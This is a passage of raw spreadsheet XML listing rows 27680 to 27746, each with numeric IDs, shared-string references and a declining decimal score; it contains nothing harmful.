      </c>
    </row>
    <row r="27680" ht="15.75" customHeight="1">
      <c r="A27680" s="1">
        <v>11998.0</v>
      </c>
      <c r="B27680" s="2">
        <v>2.5948351E7</v>
      </c>
      <c r="C27680" s="2" t="s">
        <v>26604</v>
      </c>
      <c r="D27680" s="2">
        <v>1.0</v>
      </c>
      <c r="E27680" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27680" s="2">
        <v>0.1803418803418803</v>
      </c>
    </row>
    <row r="27681" ht="15.75" customHeight="1">
      <c r="A27681" s="1">
        <v>23124.0</v>
      </c>
      <c r="B27681" s="2">
        <v>5.1307878E7</v>
      </c>
      <c r="C27681" s="2" t="s">
        <v>26605</v>
      </c>
      <c r="D27681" s="2">
        <v>1.0</v>
      </c>
      <c r="E27681" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27681" s="2">
        <v>0.1801075268817205</v>
      </c>
    </row>
    <row r="27682" ht="15.75" customHeight="1">
      <c r="A27682" s="1">
        <v>23612.0</v>
      </c>
      <c r="B27682" s="2">
        <v>6423939.0</v>
      </c>
      <c r="C27682" s="2" t="s">
        <v>26606</v>
      </c>
      <c r="D27682" s="2">
        <v>1.0</v>
      </c>
      <c r="E27682" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27682" s="2">
        <v>0.1794171220400729</v>
      </c>
    </row>
    <row r="27683" ht="15.75" customHeight="1">
      <c r="A27683" s="1">
        <v>26911.0</v>
      </c>
      <c r="B27683" s="2">
        <v>1.9347707E7</v>
      </c>
      <c r="C27683" s="2" t="s">
        <v>26607</v>
      </c>
      <c r="D27683" s="2">
        <v>1.0</v>
      </c>
      <c r="E27683" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27683" s="2">
        <v>0.178714859437751</v>
      </c>
    </row>
    <row r="27684" ht="15.75" customHeight="1">
      <c r="A27684" s="1">
        <v>2578.0</v>
      </c>
      <c r="B27684" s="2">
        <v>3.4292191E7</v>
      </c>
      <c r="C27684" s="2" t="s">
        <v>26608</v>
      </c>
      <c r="D27684" s="2">
        <v>1.0</v>
      </c>
      <c r="E27684" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27684" s="2">
        <v>0.1776406035665295</v>
      </c>
    </row>
    <row r="27685" ht="15.75" customHeight="1">
      <c r="A27685" s="1">
        <v>31991.0</v>
      </c>
      <c r="B27685" s="2">
        <v>5329394.0</v>
      </c>
      <c r="C27685" s="2" t="s">
        <v>26609</v>
      </c>
      <c r="D27685" s="2">
        <v>1.0</v>
      </c>
      <c r="E27685" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27685" s="2">
        <v>0.1775793650793651</v>
      </c>
    </row>
    <row r="27686" ht="15.75" customHeight="1">
      <c r="A27686" s="1">
        <v>1288.0</v>
      </c>
      <c r="B27686" s="2">
        <v>2.5592564E7</v>
      </c>
      <c r="C27686" s="2" t="s">
        <v>26610</v>
      </c>
      <c r="D27686" s="2">
        <v>1.0</v>
      </c>
      <c r="E27686" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27686" s="2">
        <v>0.1770833333333333</v>
      </c>
    </row>
    <row r="27687" ht="15.75" customHeight="1">
      <c r="A27687" s="1">
        <v>19691.0</v>
      </c>
      <c r="B27687" s="2">
        <v>5.6470295E7</v>
      </c>
      <c r="C27687" s="2" t="s">
        <v>26611</v>
      </c>
      <c r="D27687" s="2">
        <v>1.0</v>
      </c>
      <c r="E27687" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27687" s="2">
        <v>0.1768518518518519</v>
      </c>
    </row>
    <row r="27688" ht="15.75" customHeight="1">
      <c r="A27688" s="1">
        <v>6110.0</v>
      </c>
      <c r="B27688" s="2">
        <v>4.7750892E7</v>
      </c>
      <c r="C27688" s="2" t="s">
        <v>26612</v>
      </c>
      <c r="D27688" s="2">
        <v>1.0</v>
      </c>
      <c r="E27688" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27688" s="2">
        <v>0.1766169154228856</v>
      </c>
    </row>
    <row r="27689" ht="15.75" customHeight="1">
      <c r="A27689" s="1">
        <v>33311.0</v>
      </c>
      <c r="B27689" s="2">
        <v>7509335.0</v>
      </c>
      <c r="C27689" s="2" t="s">
        <v>26613</v>
      </c>
      <c r="D27689" s="2">
        <v>1.0</v>
      </c>
      <c r="E27689" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27689" s="2">
        <v>0.176328502415459</v>
      </c>
    </row>
    <row r="27690" ht="15.75" customHeight="1">
      <c r="A27690" s="1">
        <v>30274.0</v>
      </c>
      <c r="B27690" s="2">
        <v>3.7724749E7</v>
      </c>
      <c r="C27690" s="2" t="s">
        <v>26614</v>
      </c>
      <c r="D27690" s="2">
        <v>1.0</v>
      </c>
      <c r="E27690" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27690" s="2">
        <v>0.1756944444444445</v>
      </c>
    </row>
    <row r="27691" ht="15.75" customHeight="1">
      <c r="A27691" s="1">
        <v>26866.0</v>
      </c>
      <c r="B27691" s="2">
        <v>1.906168E7</v>
      </c>
      <c r="C27691" s="2" t="s">
        <v>26615</v>
      </c>
      <c r="D27691" s="2">
        <v>1.0</v>
      </c>
      <c r="E27691" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27691" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="27692" ht="15.75" customHeight="1">
      <c r="A27692" s="1">
        <v>2348.0</v>
      </c>
      <c r="B27692" s="2">
        <v>3.3071715E7</v>
      </c>
      <c r="C27692" s="2" t="s">
        <v>26616</v>
      </c>
      <c r="D27692" s="2">
        <v>1.0</v>
      </c>
      <c r="E27692" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27692" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="27693" ht="15.75" customHeight="1">
      <c r="A27693" s="1">
        <v>30940.0</v>
      </c>
      <c r="B27693" s="2">
        <v>4.729685E7</v>
      </c>
      <c r="C27693" s="2" t="s">
        <v>26617</v>
      </c>
      <c r="D27693" s="2">
        <v>1.0</v>
      </c>
      <c r="E27693" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27693" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="27694" ht="15.75" customHeight="1">
      <c r="A27694" s="1">
        <v>25966.0</v>
      </c>
      <c r="B27694" s="2">
        <v>1.526871E7</v>
      </c>
      <c r="C27694" s="2" t="s">
        <v>26618</v>
      </c>
      <c r="D27694" s="2">
        <v>1.0</v>
      </c>
      <c r="E27694" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27694" s="2">
        <v>0.1737213403880071</v>
      </c>
    </row>
    <row r="27695" ht="15.75" customHeight="1">
      <c r="A27695" s="1">
        <v>26274.0</v>
      </c>
      <c r="B27695" s="2">
        <v>1.6400145E7</v>
      </c>
      <c r="C27695" s="2" t="s">
        <v>26619</v>
      </c>
      <c r="D27695" s="2">
        <v>1.0</v>
      </c>
      <c r="E27695" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27695" s="2">
        <v>0.1735042735042736</v>
      </c>
    </row>
    <row r="27696" ht="15.75" customHeight="1">
      <c r="A27696" s="1">
        <v>30944.0</v>
      </c>
      <c r="B27696" s="2">
        <v>4.7318296E7</v>
      </c>
      <c r="C27696" s="2" t="s">
        <v>26617</v>
      </c>
      <c r="D27696" s="2">
        <v>1.0</v>
      </c>
      <c r="E27696" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27696" s="2">
        <v>0.1727430555555556</v>
      </c>
    </row>
    <row r="27697" ht="15.75" customHeight="1">
      <c r="A27697" s="1">
        <v>30311.0</v>
      </c>
      <c r="B27697" s="2">
        <v>3.8007842E7</v>
      </c>
      <c r="C27697" s="2" t="s">
        <v>26620</v>
      </c>
      <c r="D27697" s="2">
        <v>1.0</v>
      </c>
      <c r="E27697" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27697" s="2">
        <v>0.172514619883041</v>
      </c>
    </row>
    <row r="27698" ht="15.75" customHeight="1">
      <c r="A27698" s="1">
        <v>78.0</v>
      </c>
      <c r="B27698" s="2">
        <v>1.1816133E7</v>
      </c>
      <c r="C27698" s="2" t="s">
        <v>26621</v>
      </c>
      <c r="D27698" s="2">
        <v>1.0</v>
      </c>
      <c r="E27698" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27698" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="27699" ht="15.75" customHeight="1">
      <c r="A27699" s="1">
        <v>24567.0</v>
      </c>
      <c r="B27699" s="2">
        <v>1.1316653E7</v>
      </c>
      <c r="C27699" s="2" t="s">
        <v>26622</v>
      </c>
      <c r="D27699" s="2">
        <v>1.0</v>
      </c>
      <c r="E27699" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27699" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="27700" ht="15.75" customHeight="1">
      <c r="A27700" s="1">
        <v>7374.0</v>
      </c>
      <c r="B27700" s="2">
        <v>5.1041601E7</v>
      </c>
      <c r="C27700" s="2" t="s">
        <v>26623</v>
      </c>
      <c r="D27700" s="2">
        <v>1.0</v>
      </c>
      <c r="E27700" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27700" s="2">
        <v>0.171921921921922</v>
      </c>
    </row>
    <row r="27701" ht="15.75" customHeight="1">
      <c r="A27701" s="1">
        <v>24569.0</v>
      </c>
      <c r="B27701" s="2">
        <v>1.1316653E7</v>
      </c>
      <c r="C27701" s="2" t="s">
        <v>26624</v>
      </c>
      <c r="D27701" s="2">
        <v>1.0</v>
      </c>
      <c r="E27701" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27701" s="2">
        <v>0.171455938697318</v>
      </c>
    </row>
    <row r="27702" ht="15.75" customHeight="1">
      <c r="A27702" s="1">
        <v>33779.0</v>
      </c>
      <c r="B27702" s="2">
        <v>8695427.0</v>
      </c>
      <c r="C27702" s="2" t="s">
        <v>26625</v>
      </c>
      <c r="D27702" s="2">
        <v>1.0</v>
      </c>
      <c r="E27702" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27702" s="2">
        <v>0.1707516339869282</v>
      </c>
    </row>
    <row r="27703" ht="15.75" customHeight="1">
      <c r="A27703" s="1">
        <v>33862.0</v>
      </c>
      <c r="B27703" s="2">
        <v>9061791.0</v>
      </c>
      <c r="C27703" s="2" t="s">
        <v>26626</v>
      </c>
      <c r="D27703" s="2">
        <v>1.0</v>
      </c>
      <c r="E27703" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27703" s="2">
        <v>0.1704331450094163</v>
      </c>
    </row>
    <row r="27704" ht="15.75" customHeight="1">
      <c r="A27704" s="1">
        <v>17848.0</v>
      </c>
      <c r="B27704" s="2">
        <v>5.0968303E7</v>
      </c>
      <c r="C27704" s="2" t="s">
        <v>26627</v>
      </c>
      <c r="D27704" s="2">
        <v>1.0</v>
      </c>
      <c r="E27704" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27704" s="2">
        <v>0.1698872785829308</v>
      </c>
    </row>
    <row r="27705" ht="15.75" customHeight="1">
      <c r="A27705" s="1">
        <v>22539.0</v>
      </c>
      <c r="B27705" s="2">
        <v>3.8007843E7</v>
      </c>
      <c r="C27705" s="2" t="s">
        <v>26628</v>
      </c>
      <c r="D27705" s="2">
        <v>1.0</v>
      </c>
      <c r="E27705" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27705" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="27706" ht="15.75" customHeight="1">
      <c r="A27706" s="1">
        <v>12221.0</v>
      </c>
      <c r="B27706" s="2">
        <v>2.7730258E7</v>
      </c>
      <c r="C27706" s="2" t="s">
        <v>26629</v>
      </c>
      <c r="D27706" s="2">
        <v>1.0</v>
      </c>
      <c r="E27706" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27706" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="27707" ht="15.75" customHeight="1">
      <c r="A27707" s="1">
        <v>17169.0</v>
      </c>
      <c r="B27707" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C27707" s="2" t="s">
        <v>26630</v>
      </c>
      <c r="D27707" s="2">
        <v>1.0</v>
      </c>
      <c r="E27707" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27707" s="2">
        <v>0.1694101508916324</v>
      </c>
    </row>
    <row r="27708" ht="15.75" customHeight="1">
      <c r="A27708" s="1">
        <v>21791.0</v>
      </c>
      <c r="B27708" s="2">
        <v>2.660863E7</v>
      </c>
      <c r="C27708" s="2" t="s">
        <v>26631</v>
      </c>
      <c r="D27708" s="2">
        <v>1.0</v>
      </c>
      <c r="E27708" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27708" s="2">
        <v>0.1684303350970018</v>
      </c>
    </row>
    <row r="27709" ht="15.75" customHeight="1">
      <c r="A27709" s="1">
        <v>18356.0</v>
      </c>
      <c r="B27709" s="2">
        <v>5.2511334E7</v>
      </c>
      <c r="C27709" s="2" t="s">
        <v>26632</v>
      </c>
      <c r="D27709" s="2">
        <v>1.0</v>
      </c>
      <c r="E27709" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27709" s="2">
        <v>0.167562724014337</v>
      </c>
    </row>
    <row r="27710" ht="15.75" customHeight="1">
      <c r="A27710" s="1">
        <v>29932.0</v>
      </c>
      <c r="B27710" s="2">
        <v>3607053.0</v>
      </c>
      <c r="C27710" s="2" t="s">
        <v>26633</v>
      </c>
      <c r="D27710" s="2">
        <v>1.0</v>
      </c>
      <c r="E27710" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27710" s="2">
        <v>0.1673976608187135</v>
      </c>
    </row>
    <row r="27711" ht="15.75" customHeight="1">
      <c r="A27711" s="1">
        <v>16464.0</v>
      </c>
      <c r="B27711" s="2">
        <v>4.6460432E7</v>
      </c>
      <c r="C27711" s="2" t="s">
        <v>26634</v>
      </c>
      <c r="D27711" s="2">
        <v>1.0</v>
      </c>
      <c r="E27711" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27711" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="27712" ht="15.75" customHeight="1">
      <c r="A27712" s="1">
        <v>20619.0</v>
      </c>
      <c r="B27712" s="2">
        <v>1.4010853E7</v>
      </c>
      <c r="C27712" s="2" t="s">
        <v>26635</v>
      </c>
      <c r="D27712" s="2">
        <v>1.0</v>
      </c>
      <c r="E27712" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27712" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="27713" ht="15.75" customHeight="1">
      <c r="A27713" s="1">
        <v>8382.0</v>
      </c>
      <c r="B27713" s="2">
        <v>5.382409E7</v>
      </c>
      <c r="C27713" s="2" t="s">
        <v>26636</v>
      </c>
      <c r="D27713" s="2">
        <v>1.0</v>
      </c>
      <c r="E27713" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27713" s="2">
        <v>0.1657986111111112</v>
      </c>
    </row>
    <row r="27714" ht="15.75" customHeight="1">
      <c r="A27714" s="1">
        <v>14110.0</v>
      </c>
      <c r="B27714" s="2">
        <v>3.7771422E7</v>
      </c>
      <c r="C27714" s="2" t="s">
        <v>26637</v>
      </c>
      <c r="D27714" s="2">
        <v>1.0</v>
      </c>
      <c r="E27714" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27714" s="2">
        <v>0.1650082918739636</v>
      </c>
    </row>
    <row r="27715" ht="15.75" customHeight="1">
      <c r="A27715" s="1">
        <v>13658.0</v>
      </c>
      <c r="B27715" s="2">
        <v>3.5966489E7</v>
      </c>
      <c r="C27715" s="2" t="s">
        <v>26638</v>
      </c>
      <c r="D27715" s="2">
        <v>1.0</v>
      </c>
      <c r="E27715" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27715" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="27716" ht="15.75" customHeight="1">
      <c r="A27716" s="1">
        <v>24654.0</v>
      </c>
      <c r="B27716" s="2">
        <v>1.1512449E7</v>
      </c>
      <c r="C27716" s="2" t="s">
        <v>26639</v>
      </c>
      <c r="D27716" s="2">
        <v>1.0</v>
      </c>
      <c r="E27716" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27716" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="27717" ht="15.75" customHeight="1">
      <c r="A27717" s="1">
        <v>1498.0</v>
      </c>
      <c r="B27717" s="2">
        <v>2.7239166E7</v>
      </c>
      <c r="C27717" s="2" t="s">
        <v>26640</v>
      </c>
      <c r="D27717" s="2">
        <v>1.0</v>
      </c>
      <c r="E27717" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27717" s="2">
        <v>0.1633499170812604</v>
      </c>
    </row>
    <row r="27718" ht="15.75" customHeight="1">
      <c r="A27718" s="1">
        <v>12985.0</v>
      </c>
      <c r="B27718" s="2">
        <v>3.2718968E7</v>
      </c>
      <c r="C27718" s="2" t="s">
        <v>26641</v>
      </c>
      <c r="D27718" s="2">
        <v>1.0</v>
      </c>
      <c r="E27718" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27718" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="27719" ht="15.75" customHeight="1">
      <c r="A27719" s="1">
        <v>4138.0</v>
      </c>
      <c r="B27719" s="2">
        <v>4.1387443E7</v>
      </c>
      <c r="C27719" s="2" t="s">
        <v>26642</v>
      </c>
      <c r="D27719" s="2">
        <v>1.0</v>
      </c>
      <c r="E27719" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27719" s="2">
        <v>0.1621004566210046</v>
      </c>
    </row>
    <row r="27720" ht="15.75" customHeight="1">
      <c r="A27720" s="1">
        <v>20853.0</v>
      </c>
      <c r="B27720" s="2">
        <v>1.5743374E7</v>
      </c>
      <c r="C27720" s="2" t="s">
        <v>26643</v>
      </c>
      <c r="D27720" s="2">
        <v>1.0</v>
      </c>
      <c r="E27720" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27720" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="27721" ht="15.75" customHeight="1">
      <c r="A27721" s="1">
        <v>4044.0</v>
      </c>
      <c r="B27721" s="2">
        <v>4.1061282E7</v>
      </c>
      <c r="C27721" s="2" t="s">
        <v>26644</v>
      </c>
      <c r="D27721" s="2">
        <v>1.0</v>
      </c>
      <c r="E27721" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27721" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="27722" ht="15.75" customHeight="1">
      <c r="A27722" s="1">
        <v>28899.0</v>
      </c>
      <c r="B27722" s="2">
        <v>2.9330665E7</v>
      </c>
      <c r="C27722" s="2" t="s">
        <v>26645</v>
      </c>
      <c r="D27722" s="2">
        <v>1.0</v>
      </c>
      <c r="E27722" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27722" s="2">
        <v>0.161231884057971</v>
      </c>
    </row>
    <row r="27723" ht="15.75" customHeight="1">
      <c r="A27723" s="1">
        <v>12650.0</v>
      </c>
      <c r="B27723" s="2">
        <v>3.0387303E7</v>
      </c>
      <c r="C27723" s="2" t="s">
        <v>26646</v>
      </c>
      <c r="D27723" s="2">
        <v>1.0</v>
      </c>
      <c r="E27723" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27723" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="27724" ht="15.75" customHeight="1">
      <c r="A27724" s="1">
        <v>20803.0</v>
      </c>
      <c r="B27724" s="2">
        <v>1.5290494E7</v>
      </c>
      <c r="C27724" s="2" t="s">
        <v>26635</v>
      </c>
      <c r="D27724" s="2">
        <v>1.0</v>
      </c>
      <c r="E27724" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27724" s="2">
        <v>0.1612021857923498</v>
      </c>
    </row>
    <row r="27725" ht="15.75" customHeight="1">
      <c r="A27725" s="1">
        <v>27395.0</v>
      </c>
      <c r="B27725" s="2">
        <v>2.1797757E7</v>
      </c>
      <c r="C27725" s="2" t="s">
        <v>26647</v>
      </c>
      <c r="D27725" s="2">
        <v>1.0</v>
      </c>
      <c r="E27725" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27725" s="2">
        <v>0.1609477124183007</v>
      </c>
    </row>
    <row r="27726" ht="15.75" customHeight="1">
      <c r="A27726" s="1">
        <v>146.0</v>
      </c>
      <c r="B27726" s="2">
        <v>1.3592493E7</v>
      </c>
      <c r="C27726" s="2" t="s">
        <v>26648</v>
      </c>
      <c r="D27726" s="2">
        <v>1.0</v>
      </c>
      <c r="E27726" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27726" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="27727" ht="15.75" customHeight="1">
      <c r="A27727" s="1">
        <v>27699.0</v>
      </c>
      <c r="B27727" s="2">
        <v>2.3016874E7</v>
      </c>
      <c r="C27727" s="2" t="s">
        <v>26649</v>
      </c>
      <c r="D27727" s="2">
        <v>1.0</v>
      </c>
      <c r="E27727" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27727" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="27728" ht="15.75" customHeight="1">
      <c r="A27728" s="1">
        <v>27701.0</v>
      </c>
      <c r="B27728" s="2">
        <v>2.3016913E7</v>
      </c>
      <c r="C27728" s="2" t="s">
        <v>26650</v>
      </c>
      <c r="D27728" s="2">
        <v>1.0</v>
      </c>
      <c r="E27728" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27728" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="27729" ht="15.75" customHeight="1">
      <c r="A27729" s="1">
        <v>20852.0</v>
      </c>
      <c r="B27729" s="2">
        <v>1.5743374E7</v>
      </c>
      <c r="C27729" s="2" t="s">
        <v>26651</v>
      </c>
      <c r="D27729" s="2">
        <v>1.0</v>
      </c>
      <c r="E27729" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27729" s="2">
        <v>0.1606060606060606</v>
      </c>
    </row>
    <row r="27730" ht="15.75" customHeight="1">
      <c r="A27730" s="1">
        <v>26102.0</v>
      </c>
      <c r="B27730" s="2">
        <v>1.5743373E7</v>
      </c>
      <c r="C27730" s="2" t="s">
        <v>26651</v>
      </c>
      <c r="D27730" s="2">
        <v>1.0</v>
      </c>
      <c r="E27730" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27730" s="2">
        <v>0.1606060606060606</v>
      </c>
    </row>
    <row r="27731" ht="15.75" customHeight="1">
      <c r="A27731" s="1">
        <v>771.0</v>
      </c>
      <c r="B27731" s="2">
        <v>2.1068471E7</v>
      </c>
      <c r="C27731" s="2" t="s">
        <v>26652</v>
      </c>
      <c r="D27731" s="2">
        <v>1.0</v>
      </c>
      <c r="E27731" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27731" s="2">
        <v>0.1605902777777778</v>
      </c>
    </row>
    <row r="27732" ht="15.75" customHeight="1">
      <c r="A27732" s="1">
        <v>19487.0</v>
      </c>
      <c r="B27732" s="2">
        <v>5.5858119E7</v>
      </c>
      <c r="C27732" s="2" t="s">
        <v>26653</v>
      </c>
      <c r="D27732" s="2">
        <v>1.0</v>
      </c>
      <c r="E27732" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27732" s="2">
        <v>0.1602254428341385</v>
      </c>
    </row>
    <row r="27733" ht="15.75" customHeight="1">
      <c r="A27733" s="1">
        <v>12285.0</v>
      </c>
      <c r="B27733" s="2">
        <v>2.8181183E7</v>
      </c>
      <c r="C27733" s="2" t="s">
        <v>26654</v>
      </c>
      <c r="D27733" s="2">
        <v>1.0</v>
      </c>
      <c r="E27733" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27733" s="2">
        <v>0.1599616858237548</v>
      </c>
    </row>
    <row r="27734" ht="15.75" customHeight="1">
      <c r="A27734" s="1">
        <v>9885.0</v>
      </c>
      <c r="B27734" s="2">
        <v>5.6750173E7</v>
      </c>
      <c r="C27734" s="2" t="s">
        <v>26655</v>
      </c>
      <c r="D27734" s="2">
        <v>1.0</v>
      </c>
      <c r="E27734" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27734" s="2">
        <v>0.1599099099099099</v>
      </c>
    </row>
    <row r="27735" ht="15.75" customHeight="1">
      <c r="A27735" s="1">
        <v>29886.0</v>
      </c>
      <c r="B27735" s="2">
        <v>3607007.0</v>
      </c>
      <c r="C27735" s="2" t="s">
        <v>26656</v>
      </c>
      <c r="D27735" s="2">
        <v>1.0</v>
      </c>
      <c r="E27735" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27735" s="2">
        <v>0.1596119929453264</v>
      </c>
    </row>
    <row r="27736" ht="15.75" customHeight="1">
      <c r="A27736" s="1">
        <v>16874.0</v>
      </c>
      <c r="B27736" s="2">
        <v>4.7964917E7</v>
      </c>
      <c r="C27736" s="2" t="s">
        <v>26657</v>
      </c>
      <c r="D27736" s="2">
        <v>1.0</v>
      </c>
      <c r="E27736" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27736" s="2">
        <v>0.1595238095238095</v>
      </c>
    </row>
    <row r="27737" ht="15.75" customHeight="1">
      <c r="A27737" s="1">
        <v>26376.0</v>
      </c>
      <c r="B27737" s="2">
        <v>1.6968206E7</v>
      </c>
      <c r="C27737" s="2" t="s">
        <v>26647</v>
      </c>
      <c r="D27737" s="2">
        <v>1.0</v>
      </c>
      <c r="E27737" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27737" s="2">
        <v>0.1593137254901961</v>
      </c>
    </row>
    <row r="27738" ht="15.75" customHeight="1">
      <c r="A27738" s="1">
        <v>29697.0</v>
      </c>
      <c r="B27738" s="2">
        <v>3.429615E7</v>
      </c>
      <c r="C27738" s="2" t="s">
        <v>26658</v>
      </c>
      <c r="D27738" s="2">
        <v>1.0</v>
      </c>
      <c r="E27738" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27738" s="2">
        <v>0.1593137254901961</v>
      </c>
    </row>
    <row r="27739" ht="15.75" customHeight="1">
      <c r="A27739" s="1">
        <v>17003.0</v>
      </c>
      <c r="B27739" s="2">
        <v>4.8413666E7</v>
      </c>
      <c r="C27739" s="2" t="s">
        <v>26659</v>
      </c>
      <c r="D27739" s="2">
        <v>1.0</v>
      </c>
      <c r="E27739" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27739" s="2">
        <v>0.1590563165905632</v>
      </c>
    </row>
    <row r="27740" ht="15.75" customHeight="1">
      <c r="A27740" s="1">
        <v>10469.0</v>
      </c>
      <c r="B27740" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C27740" s="2" t="s">
        <v>26660</v>
      </c>
      <c r="D27740" s="2">
        <v>1.0</v>
      </c>
      <c r="E27740" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27740" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="27741" ht="15.75" customHeight="1">
      <c r="A27741" s="1">
        <v>2192.0</v>
      </c>
      <c r="B27741" s="2">
        <v>3.1951822E7</v>
      </c>
      <c r="C27741" s="2" t="s">
        <v>26661</v>
      </c>
      <c r="D27741" s="2">
        <v>1.0</v>
      </c>
      <c r="E27741" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27741" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="27742" ht="15.75" customHeight="1">
      <c r="A27742" s="1">
        <v>26218.0</v>
      </c>
      <c r="B27742" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C27742" s="2" t="s">
        <v>26662</v>
      </c>
      <c r="D27742" s="2">
        <v>1.0</v>
      </c>
      <c r="E27742" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27742" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="27743" ht="15.75" customHeight="1">
      <c r="A27743" s="1">
        <v>29857.0</v>
      </c>
      <c r="B27743" s="2">
        <v>3.5787723E7</v>
      </c>
      <c r="C27743" s="2" t="s">
        <v>26663</v>
      </c>
      <c r="D27743" s="2">
        <v>1.0</v>
      </c>
      <c r="E27743" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27743" s="2">
        <v>0.158374792703151</v>
      </c>
    </row>
    <row r="27744" ht="15.75" customHeight="1">
      <c r="A27744" s="1">
        <v>11710.0</v>
      </c>
      <c r="B27744" s="2">
        <v>2.360865E7</v>
      </c>
      <c r="C27744" s="2" t="s">
        <v>26664</v>
      </c>
      <c r="D27744" s="2">
        <v>1.0</v>
      </c>
      <c r="E27744" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27744" s="2">
        <v>0.1583333333333334</v>
      </c>
    </row>
    <row r="27745" ht="15.75" customHeight="1">
      <c r="A27745" s="1">
        <v>8636.0</v>
      </c>
      <c r="B27745" s="2">
        <v>5.4328443E7</v>
      </c>
      <c r="C27745" s="2" t="s">
        <v>26665</v>
      </c>
      <c r="D27745" s="2">
        <v>1.0</v>
      </c>
      <c r="E27745" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27745" s="2">
        <v>0.1576797385620916</v>
      </c>
    </row>
    <row r="27746" ht="15.75" customHeight="1">
      <c r="A27746" s="1">
        <v>25009.0</v>
      </c>
      <c r="B27746" s="2">
        <v>1.2759101E7</v>
      </c>
      <c r="C27746" s="2" t="s">
        <v>26666</v>
      </c>
      <c r="D27746" s="2">
        <v>1.0</v>
      </c>
      <c r="E27746" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27746" s="2">
        <v>0.1572822822822823</v>
      </c>
    </row>
